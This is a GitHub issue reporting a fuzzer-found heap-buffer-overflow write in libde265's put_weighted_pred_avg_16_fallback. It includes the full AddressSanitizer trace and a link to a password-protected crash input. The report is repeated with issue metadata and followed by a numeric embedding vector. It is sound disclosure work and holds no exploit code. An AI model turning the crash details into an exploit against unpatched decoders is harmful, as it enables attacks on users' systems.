# heap-buffer-overflow in put_weighted_pred_avg_16_fallback when decoding file I found some problems during fuzzing ## Test Version dev version, git clone https://github.com/strukturag/libde265 ## Test Environment root@ubuntu:~# lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial root@ubuntu:~# uname -a Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux ## Test Configure ./configure configure: --------------------------------------- configure: Building dec265 example: yes configure: Building sherlock265 example: no configure: Building encoder: yes configure: --------------------------------------- ## Test Program `dec265 [infile]` ## Asan Output ``` root@ubuntu:~# ./dec265 libde265-put_weighted_pred_avg_16_fallback-heap_overflow.crash WARNING: pps header invalid WARNING: non-existing PPS referenced ================================================================= ==103499==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62a000005310 at pc 0x000000432cd8 bp 0x7ffe393c5a50 sp 0x7ffe393c5a40 WRITE of size 2 at 0x62a000005310 thread T0 #0 0x432cd7 in put_weighted_pred_avg_16_fallback(unsigned short*, long, short const*, short const*, long, int, int, int) /root/src/libde265/libde265/fallback-motion.cc:246 #1 0x52bc12 in acceleration_functions::put_weighted_pred_avg(void*, long, short const*, short const*, long, int, int, int) const ../libde265/acceleration.h:251 #2 0x52085c in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /root/src/libde265/libde265/motion.cc:513 #3 0x52b8f9 in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/motion.cc:2107 #4 0x478f4a in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/slice.cc:4137 #5 0x47a704 in read_coding_unit(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4492 #6 0x47b6fe in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4647 #7 0x47338a in read_coding_tree_unit(thread_context*) /root/src/libde265/libde265/slice.cc:2861 #8 0x47beb1 in decode_substream(thread_context*, bool, bool) /root/src/libde265/libde265/slice.cc:4736 #9 0x47db9f in read_slice_segment_data(thread_context*) /root/src/libde265/libde265/slice.cc:5049 #10 0x40bf17 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:843 #11 0x40c6d7 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:945 #12 0x40b589 in decoder_context::decode_some(bool*) /root/src/libde265/libde265/decctx.cc:730 #13 0x40b2f2 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:688 #14 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #15 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #16 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #17 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #18 0x7fa63f83582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #19 0x402b28 in _start (/root/dec265+0x402b28) 0x62a000005310 is located 0 bytes to the right of 20752-byte region [0x62a000000200,0x62a000005310) allocated by thread T0 here: #0 0x7fa640736076 in __interceptor_posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99076) #1 0x43e00d in ALLOC_ALIGNED /root/src/libde265/libde265/image.cc:54 #2 0x43e725 in de265_image_get_buffer /root/src/libde265/libde265/image.cc:132 #3 0x440639 in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) /root/src/libde265/libde265/image.cc:384 #4 0x43afa4 in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) /root/src/libde265/libde265/dpb.cc:262 #5 0x414467 in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) /root/src/libde265/libde265/decctx.cc:2012 #6 0x40acad in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:639 #7 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #8 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #9 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #10 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #11 0x7fa63f83582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-buffer-overflow /root/src/libde265/libde265/fallback-motion.cc:246 put_weighted_pred_avg_16_fallback(unsigned short*, long, short const*, short const*, long, int, int, int) Shadow bytes around the buggy address: 0x0c547fff8a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c547fff8a60: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8a70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8a80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8a90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==103499==ABORTING ``` ## POC file [libde265-put_weighted_pred_avg_16_fallback-heap_overflow.zip](https://github.com/leonzhao7/vulnerability/blob/master/libde265-put_weighted_pred_avg_16_fallback-heap_overflow.zip) password: leon.zhao.7 ## CREDIT Zhao Liang, Huawei Weiran Labs
heap-buffer-overflow in put_weighted_pred_avg_16_fallback when decoding file
https://api.github.com/repos/strukturag/libde265/issues/243/comments
4
2019-12-24T11:35:38
2023-01-24T18:10:24Z
https://github.com/strukturag/libde265/issues/243
542,100,957
243
true
This is a GitHub Issue repo:libde265 owner:strukturag Title : heap-buffer-overflow in put_weighted_pred_avg_16_fallback when decoding file Issue date: --- start body --- # heap-buffer-overflow in put_weighted_pred_avg_16_fallback when decoding file I found some problems during fuzzing ## Test Version dev version, git clone https://github.com/strukturag/libde265 ## Test Environment root@ubuntu:~# lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial root@ubuntu:~# uname -a Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux ## Test Configure ./configure configure: --------------------------------------- configure: Building dec265 example: yes configure: Building sherlock265 example: no configure: Building encoder: yes configure: --------------------------------------- ## Test Program `dec265 [infile]` ## Asan Output ``` root@ubuntu:~# ./dec265 libde265-put_weighted_pred_avg_16_fallback-heap_overflow.crash WARNING: pps header invalid WARNING: non-existing PPS referenced ================================================================= ==103499==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62a000005310 at pc 0x000000432cd8 bp 0x7ffe393c5a50 sp 0x7ffe393c5a40 WRITE of size 2 at 0x62a000005310 thread T0 #0 0x432cd7 in put_weighted_pred_avg_16_fallback(unsigned short*, long, short const*, short const*, long, int, int, int) /root/src/libde265/libde265/fallback-motion.cc:246 #1 0x52bc12 in acceleration_functions::put_weighted_pred_avg(void*, long, short const*, short const*, long, int, int, int) const ../libde265/acceleration.h:251 #2 0x52085c in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /root/src/libde265/libde265/motion.cc:513 #3 0x52b8f9 in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/motion.cc:2107 #4 0x478f4a in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/slice.cc:4137 #5 0x47a704 in read_coding_unit(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4492 #6 0x47b6fe in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4647 #7 0x47338a in read_coding_tree_unit(thread_context*) /root/src/libde265/libde265/slice.cc:2861 #8 0x47beb1 in decode_substream(thread_context*, bool, bool) /root/src/libde265/libde265/slice.cc:4736 #9 0x47db9f in read_slice_segment_data(thread_context*) /root/src/libde265/libde265/slice.cc:5049 #10 0x40bf17 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:843 #11 0x40c6d7 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:945 #12 0x40b589 in decoder_context::decode_some(bool*) /root/src/libde265/libde265/decctx.cc:730 #13 0x40b2f2 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:688 #14 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #15 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #16 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #17 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #18 0x7fa63f83582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #19 0x402b28 in _start (/root/dec265+0x402b28) 0x62a000005310 is located 0 bytes to the right of 20752-byte region [0x62a000000200,0x62a000005310) allocated by thread T0 here: #0 0x7fa640736076 in __interceptor_posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99076) #1 0x43e00d in ALLOC_ALIGNED /root/src/libde265/libde265/image.cc:54 #2 0x43e725 in de265_image_get_buffer /root/src/libde265/libde265/image.cc:132 #3 0x440639 in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) /root/src/libde265/libde265/image.cc:384 #4 0x43afa4 in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) /root/src/libde265/libde265/dpb.cc:262 #5 0x414467 in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) /root/src/libde265/libde265/decctx.cc:2012 #6 0x40acad in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:639 #7 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #8 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #9 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #10 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #11 0x7fa63f83582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-buffer-overflow /root/src/libde265/libde265/fallback-motion.cc:246 put_weighted_pred_avg_16_fallback(unsigned short*, long, short const*, short const*, long, int, int, int) Shadow bytes around the buggy address: 0x0c547fff8a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c547fff8a60: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8a70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8a80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8a90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==103499==ABORTING ``` ## POC file [libde265-put_weighted_pred_avg_16_fallback-heap_overflow.zip](https://github.com/leonzhao7/vulnerability/blob/master/libde265-put_weighted_pred_avg_16_fallback-heap_overflow.zip) password: leon.zhao.7 ## CREDIT Zhao Liang, Huawei Weiran Labs --- end body ---
7,260
[ -0.04685703665018082, 0.02784842997789383, -0.0020587679464370012, -0.0035351826809346676, 0.044557489454746246, -0.004195929504930973, -0.03165612369775772, 0.0418398380279541, -0.04781269282102585, 0.021726254373788834, -0.015902722254395485, -0.01153507363051176, -0.00803348794579506, 0.030879653990268707, 0.011370819993317127, 0.007869234308600426, -0.010392765514552593, 0.021726254373788834, -0.013998875394463539, -0.02926698327064514, 0.000664946564938873, -0.04112309589982033, -0.01742579974234104, 0.02604164183139801, -0.01748552918434143, 0.01935204491019249, -0.013229871168732643, -0.007615388371050358, -0.016828514635562897, 0.017291411757469177, 0.0004390980757307261, 0.024175124242901802, -0.0121622234582901, -0.0024078066926449537, 0.052590977400541306, 0.008466520346701145, 0.035777393728494644, 0.06880727410316467, -0.0050582606345415115, 0.01684344746172428, 0.014178060926496983, -0.0441095232963562, -0.03506065160036087, 0.01650000736117363, 0.0007512730080634356, 0.01452150009572506, 0.03768870607018471, -0.007425003685057163, -0.027071958407759666, -0.0072159538976848125, 0.0028688362799584866, -0.0251158494502306, -0.03831585496664047, -0.04082445427775383, 0.024219920858740807, -0.027101824060082436, 0.02592218481004238, 0.022622182965278625, -0.00422579376026988, 0.011796385981142521, -0.02968508191406727, -0.004460975062102079, -0.0051777176558971405, 0.03362716734409332, -0.0030797526706010103, -0.0023947409354150295, 0.002305148169398308, 0.018456118181347847, -0.03264164552092552, 0.007171157281845808, -0.015454758889973164, -0.055995501577854156, 0.009608828462660313, 0.029834404587745667, 0.01696290448307991, -0.0071039628237485886, 0.013752495869994164, 0.029431236907839775, -0.021263359114527702, 0.03192490339279175, -0.03643440827727318, 0.02223394811153412, -0.05665251612663269, 0.021338019520044327, 0.041302282363176346, 0.0003369062615092844, -0.05542808026075363, -0.07442175596952438, -0.02947603166103363, -0.04169051721692085, -0.020128516480326653, 0.032522186636924744, 0.008115614764392376, -0.0013700233539566398, -0.006017650011926889, 0.027519922703504562, -0.0479620136320591, 0.0005193582619540393, -0.06755297631025314, -0.011744122952222824, -0.05766789987683296, -0.0025496617890894413, -0.00017883563123177737, 0.011019915342330933, 0.013028287328779697, -0.021726254373788834, -0.0029453635215759277, 0.016305889934301376, 0.03064073994755745, 0.1259077489376068, 0.023577839136123657, -0.004401246551424265, 0.0165298730134964, -0.00439378060400486, 0.014820142649114132, 0.01050475612282753, 0.004009278025478125, -0.024862002581357956, -0.052800025790929794, -0.02472761459648609, 0.02380182221531868, -0.020009059458971024, -0.028296394273638725, 0.02324933186173439, -0.010452494025230408, 0.032761100679636, 0.005166518501937389, -0.007484732195734978, -0.019650688394904137, -0.04500545188784599, -0.046916764229536057, -0.027191415429115295, -0.00037960283225402236, -0.0395701564848423, 0.0016416014404967427, -0.0011824383400380611, -0.021845711395144463, 0.03771857172250748, 0.04195929691195488, 0.009168330579996109, -0.03067060373723507, -0.035717666149139404, 0.0016490675043314695, -0.004195929504930973, 0.011266294866800308, 0.02708689123392105, 0.0032664043828845024, -0.017440732568502426, -0.019366977736353874, -0.009974665939807892, -0.008914483711123466, -0.002613123506307602, 0.031058838590979576, 0.006398419383913279, 0.05127694830298424, -0.01812761090695858, 0.033477842807769775, 0.05253124609589577, 0.021173765882849693, -0.02843078412115574, -0.016947971656918526, -0.04315386712551117, -0.006417084485292435, -0.022383268922567368, 0.002771777333691716, -0.011691860854625702, 0.02536969631910324, 0.013483717106282711, -0.007410071324557066, 0.023025350645184517, 0.012095028534531593, 0.008026022464036942, 0.02650453709065914, 0.05683170258998871, -0.05928057059645653, -0.015156116336584091, 0.023413585498929024, 0.01530543714761734, -0.028908612206578255, -0.007869234308600426, -0.012304078787565231, 0.01142308209091425, 0.0033485309686511755, -0.002379808807745576, 0.014267654158174992, -0.013670369051396847, 0.03159639611840248, -0.027415398508310318, 0.014640957117080688, -0.01859050616621971, 0.01714208908379078, 0.014655889943242073, 0.007006904110312462, -0.03706155717372894, 0.019217656925320625, -0.03497105836868286, -0.02115883305668831, -0.0194416381418705, 0.034672416746616364, 0.017739376053214073, 0.00998213142156601, -0.018933946266770363, -0.037957485765218735, 0.0037106352392584085, -0.030416756868362427, 0.015365165658295155, 0.008503850549459457, 0.040316760540008545, 0.02665385976433754, -0.01501426100730896, -0.03529956564307213, -0.017067428678274155, 0.01155000552535057, 0.017948424443602562, -0.019486434757709503, 0.014081002213060856, -0.026847977191209793, 0.009765615686774254, -0.020681004971265793, -0.0005907525774091482, 0.021785983815789223, -0.02217421866953373, -0.017993221059441566, -0.014797745272517204, -0.06803080439567566, -0.011490277014672756, -0.002213688800111413, 0.016798650845885277, -0.017381003126502037, -0.014043672010302544, 0.032432593405246735, -0.029834404587745667, 0.017291411757469177, 0.023995939642190933, 0.017381003126502037, -0.019889602437615395, -0.012326477095484734, -0.007268216460943222, -0.015268106944859028, 0.006879980675876141, -0.014327382668852806, 0.031327616423368454, -0.0003530049871187657, -0.02330906130373478, -0.0049835997633636, 0.05345704033970833, -0.028102276846766472, -0.013976477086544037, -0.026907704770565033, 0.006166971288621426, 0.009287787601351738, -0.02717648446559906, 0.003529583103954792, 0.017903627827763557, 0.008115614764392376, 0.025265170261263847, 0.03894300386309624, -0.016186432912945747, -0.009496836923062801, -0.03180544450879097, 0.049425363540649414, 0.0048156133852899075, -0.01358824223279953, -0.008563579060137272, 0.001524010905995965, -0.018052950501441956, 0.0030536213889718056, 0.004345250781625509, 0.008907018229365349, -0.035478752106428146, 0.029117660596966743, -0.007380207069218159, -0.025996845215559006, -0.013707699254155159, 0.00400181207805872, 0.005327038932591677, 0.015409962274134159, -0.01075113657861948, 0.015544351190328598, -0.0051926495507359505, -0.011587335728108883, 0.022995486855506897, -0.010930322110652924, 0.04112309589982033, 0.01137828640639782, -0.00958643015474081, 0.019277384504675865, -0.012923762202262878, -0.02665385976433754, -0.010407697409391403, -0.015320369973778725, 0.017858833074569702, -0.05566699430346489, -0.009974665939807892, 0.009496836923062801, 0.03186517581343651, -0.03386608138680458, 0.02435431070625782, 0.0007046100799925625, -0.01803801767528057, -0.019426707178354263, 0.01708236150443554, 0.004281789530068636, -0.014820142649114132, -0.057369258254766464, -0.00852624885737896, -0.03076019696891308, 0.025444356724619865, -0.04231766611337662, -0.022278744727373123, 0.04975387081503868, -0.016753854230046272, -0.027430329471826553, -0.004595364443957806, -0.04163078963756561, 0.014439373277127743, -0.012901363894343376, -0.0059056589379906654, -0.01975521259009838, 0.01981494203209877, -0.03192490339279175, 0.018471049144864082, -0.03864436224102974, -0.004938803147524595, 0.00063088268507272, -0.039032597094774246, -0.017530325800180435, 0.040197305381298065, -0.10303172469139099, 0.006891179829835892, -0.013289599679410458, -0.008369460701942444, -0.02793802320957184, -0.019620824605226517, -0.009780547581613064, -0.018456118181347847, -0.04840997979044914, 0.01437217928469181, 0.000702276942320168, 0.012289145961403847, -0.020113583654165268, 0.020651141181588173, 0.004595364443957806, -0.0036023773718625307, -0.016126705333590508, -0.015992315486073494, -0.005864595528692007, -0.015395030379295349, 0.03174571692943573, 0.003372795879840851, 0.0011320423800498247, 0.03362716734409332, 0.038166534155607224, 0.06528329104185104, 0.016380550339818, -0.05862355977296829, -0.037031691521406174, 0.01217715535312891, 0.012490729801356792, 0.01013891864567995, -0.027714040130376816, 0.008966746740043163, -0.005991518963128328, -0.003613576525822282, -0.0023406120017170906, 0.010034394450485706, 0.009377379901707172, -0.006323758978396654, 0.008966746740043163, -0.0020513019990175962, -0.025698203593492508, 0.047006357461214066, -0.005883260630071163, 0.03320906683802605, 0.00011140771675854921, -0.022353405132889748, 0.012080096639692783, 0.01441697496920824, -0.03592671453952789, 0.01647014357149601, -0.02598191238939762, 0.028042547404766083, 0.0395701564848423, -0.04449775815010071, 0.02193530462682247, 0.012722178362309933, -0.03198463097214699, 0.019157927483320236, -0.009011542424559593, -0.01714208908379078, -0.025175578892230988, 0.0408543199300766, -0.015484622679650784, -0.043631695210933685, -0.0025328632909804583, 0.024623088538646698, 0.005017197225242853, 0.0022939490154385567, 0.023264264687895775, -0.03852490708231926, 0.0005212248070165515, 0.008884619921445847, 0.01969548501074314, 0.006122175138443708, -0.010153851471841335, 0.0661194920539856, 0.011572403833270073, -0.010131453163921833, 0.0048492103815078735, -0.0014054870698601007, 0.026056574657559395, -0.007197288796305656, -0.03395567461848259, -0.006663464941084385, 0.053785547614097595, 0.04987332597374916, -0.005528622772544622, 0.008645705878734589, -0.02619096264243126, 0.04088418185710907, -0.04404979571700096, 0.00047876156168058515, 0.022308608517050743, 0.022652046754956245, 0.016947971656918526, 0.03401540219783783, -0.03968961164355278, -0.009504303336143494, 0.04169051721692085, -0.02018824592232704, -0.0021147634834051132, -0.0038972869515419006, 0.015604079701006413, -0.018456118181347847, -0.027161551639437675, -0.03706155717372894, -0.008533714339137077, -0.041600923985242844, -0.03610590100288391, -0.005271043162792921, -0.012251815758645535, 0.02193530462682247, -0.03407512977719307, -0.027251144871115685, 0.0007195422076620162, -0.06038555130362511, -0.0067493245005607605, 0.006566405761986971, 0.00232754647731781, -0.03951042518019676, -0.032522186636924744, 0.03989866375923157, -0.00654027471318841, -0.014894803985953331, -0.00252353074029088, 0.011057245545089245, -0.010422629304230213, -0.013558377511799335, 0.04091404750943184, -0.03153666853904724, -0.021666526794433594, 0.03308960795402527, 0.0008595309918746352, -0.011841182596981525, 0.0017899895319715142, 0.04291495308279991, -0.009242990985512733, -0.05913124978542328, -0.009213126264512539, -0.013005889020860195, -0.015842994675040245, 0.035837121307849884, -0.0012682981323450804, -0.0001826853258535266, 0.02708689123392105, 0.03002852201461792, -0.002657919889315963, -0.021203629672527313, -0.010594349354505539, -0.022219015285372734, -0.01879955641925335, -0.031028974801301956, 0.032761100679636, 0.008809959515929222, 0.02892354317009449, -0.010459959506988525, -0.013073083013296127, 0.004505771212279797, 0.015335301868617535, 0.013334395363926888, 0.015932587906718254, -0.016679193824529648, -0.015589147806167603, -0.036733049899339676, -0.0037927620578557253, -0.006398419383913279, -0.006790387909859419, -0.015088921412825584, 0.050261564552783966, 0.016918107867240906, 0.03285069391131401, -0.0176647137850523, 0.03168598935008049, -0.019396841526031494, -0.013028287328779697, -0.0238316860049963, -0.017530325800180435, 0.028669698163866997, -0.004166065249592066, -0.02944616787135601, 0.015589147806167603, -0.010288240388035774, 0.014118332415819168, -0.053636226803064346, -0.001241233665496111, -0.026609063148498535, 0.015006794594228268, -0.004188463557511568, 0.015813129022717476, 0.012677381746470928, -0.019979195669293404, -0.0014026873977854848, 0.005084391683340073, 0.0411529615521431, 0.026877840980887413, 0.010922855697572231, 0.019949331879615784, -0.010676476173102856, -0.008780094794929028, -0.03213395178318024, -0.004886541049927473, 0.0067343926057219505, -0.028848882764577866, 0.0074548679403960705, 0.008959280326962471, 0.010206113569438457, -0.009235524572432041, 0.010601814836263657, -0.007734845392405987, -0.006760523654520512, 0.007159958127886057, 0.04094391316175461, -0.03255205228924751, 0.0007886033272370696, -0.045692328363657, 0.016798650845885277, 0.0204271599650383, 0.007156225387006998, -0.004587898030877113, -0.0009276588098146021, 0.006346156820654869, -0.032522186636924744, -0.008496384136378765, 0.014939599670469761, -0.0029210986103862524, 0.03413485735654831, -0.004774549975991249, 0.023786889389157295, -0.001561341225169599, 0.01585792563855648, 0.0013466918608173728, -0.030297299847006798, -0.0006523476331494749, -0.0036546397022902966, 0.0032085422426462173, -0.0051777176558971405, -0.020621277391910553, 0.03544888645410538, -0.03643440827727318, 0.000977121526375413, 0.004972400609403849, -0.010064258240163326, 0.017067428678274155, -0.003066686913371086, 0.00037890291423536837, 0.02100951224565506, -0.01412579882889986, -0.016111772507429123, -0.022562455385923386, -0.012050231918692589, 0.005341970827430487, -0.03422445058822632, -0.01423032395541668, 0.01800815388560295, 0.02514571323990822, -0.025728067383170128, 0.002447003498673439, 0.0033205333165824413, 0.000702276942320168, -0.023816753178834915, 0.006249098107218742, 0.022487793117761612, -0.0230402834713459, 0.0023518111556768417, -0.008936882019042969, -0.022861097007989883, 0.009713353589177132, -0.016485076397657394, -0.00022654846543446183, -0.013304531574249268, -0.028535308316349983, 0.023443451151251793, 0.0061483061872422695, -0.03049141727387905, 0.0028296394739300013, -0.005633147433400154, -0.010892991907894611, -0.004057807382196188, -0.04760364443063736, 0.04622988775372505, 0.029252050444483757, 0.014678287319839, 0.039062462747097015, -0.005125455092638731, 0.014872405678033829, -0.025832591578364372, -0.006764256861060858, 0.02377195656299591, -0.015813129022717476, 0.03162625804543495, 0.020233042538166046, -0.03616562858223915, 0.019023539498448372, 0.012774440459907055, 0.018172407522797585, 0.026892773807048798, -0.01769457943737507, -0.012662449851632118, -0.017843900248408318, -0.022457929328083992, -0.019486434757709503, 0.036912236362695694, -0.0050731925293803215, -0.047125816345214844, -0.02708689123392105, 0.03162625804543495, 0.03288055956363678, 0.004274323582649231, 0.01414073072373867, -0.012199553661048412, 0.022308608517050743, 0.016888244077563286, -0.014715618453919888, -0.0050582606345415115, -0.031118568032979965, 0.0017171953804790974, -0.006017650011926889, 0.009101135656237602, 0.036733049899339676, 0.020233042538166046, -0.016723990440368652, -0.009123533964157104, 0.004072739742696285, 0.017649782821536064, 0.012737110257148743, -0.01101244892925024, 0.058295052498579025, 0.026280555874109268, -0.03014797903597355, -0.02607150562107563, -0.022876029834151268, -0.015006794594228268, -0.025832591578364372, 0.0014017540961503983, 0.01588779129087925, -0.006775456015020609, -0.004699889104813337, 0.0065253423526883125, 0.03783802688121796, 0.01322240475565195, -0.0033112007658928633, -0.02392127923667431, 0.013871952891349792, 0.005748871713876724, -0.0034511894918978214, -0.04112309589982033, 0.020651141181588173, 0.04685703665018082, -0.00252353074029088, 0.0062677632085978985, -0.0007237418903969228, 0.008630773052573204, 0.015529419295489788, -0.001500679412856698, -0.041182827204465866, 0.006435749586671591, 0.0036751714069396257, 0.007660184986889362, -0.04318373277783394, -0.03308960795402527, 0.026205895468592644, 0.0006859449204057455, 0.039092328399419785, 0.024712681770324707, 0.025757931172847748, -0.04754391312599182, 0.03326879441738129, -0.0008688635425642133, -0.011243896558880806, 0.0012207019608467817, -0.02843078412115574, 0.0004402646445669234, 0.001935577834956348, -0.006222967058420181, 0.022129422053694725, 0.02057648077607155, -0.009011542424559593, -0.009937334805727005, -0.01272964384406805, 0.011751589365303516, -0.025787794962525368, -0.0029043001122772694, -0.025787794962525368, 0.014349780976772308, 0.01573846861720085, -0.015992315486073494, -0.005909392144531012, 0.01629095897078514, -0.02330906130373478, -0.0003586045349948108, -0.017231682315468788, -0.02650453709065914, -0.011691860854625702, -0.04721540957689285, -0.011796385981142521, -0.01693304069340229, -0.02622082829475403, 0.018695032224059105, -0.0010041859932243824, 0.012393671087920666, -0.017560189589858055, -0.02793802320957184, 0.02106924168765545, 0.014536432921886444, -0.003789029084146023, 0.020009059458971024, 0.015148649923503399, 0.0003707369032781571, 0.007604189217090607, 0.009855208918452263, 0.0050731925293803215, 0.002223021350800991, 0.031028974801301956, -0.027893226593732834, -0.01219208724796772, -0.028878746554255486, 0.0011516407830640674, 0.0028128407429903746, -0.03634481504559517, 0.021845711395144463, 0.01113190595060587, 0.008220139890909195, 0.021547069773077965, -0.046916764229536057, -0.01876969262957573, -0.006726926192641258, 0.03273123875260353, -0.012587789446115494, -0.0032944020349532366, -0.02426471747457981, -0.0062602972611784935, 0.025966981425881386, 0.026907704770565033, 0.010922855697572231, 0.032253410667181015, -0.004976133815944195, 0.000003007570967383799, -0.013976477086544037, 0.018695032224059105, -0.0181574746966362, 0.01271471194922924, 0.012811770662665367, -0.039271511137485504, -0.008735298179090023, 0.021278290078043938, -0.020233042538166046, -0.0030088250059634447, 0.033597301691770554, 0.031088702380657196, 0.04763350635766983, -0.04100364074110985, -0.004535635933279991, -0.01699276827275753, 0.011736657470464706, -0.03213395178318024, -0.01076606847345829, 0.01873982883989811, -0.001589338993653655, 0.0023499445524066687, 0.00880249310284853, -0.019366977736353874, -0.0024768677540123463, 0.029252050444483757, -0.02196516841650009, -0.014984396286308765, 0.003975680563598871, 0.020681004971265793, 0.005513690412044525, -0.003639707574620843, 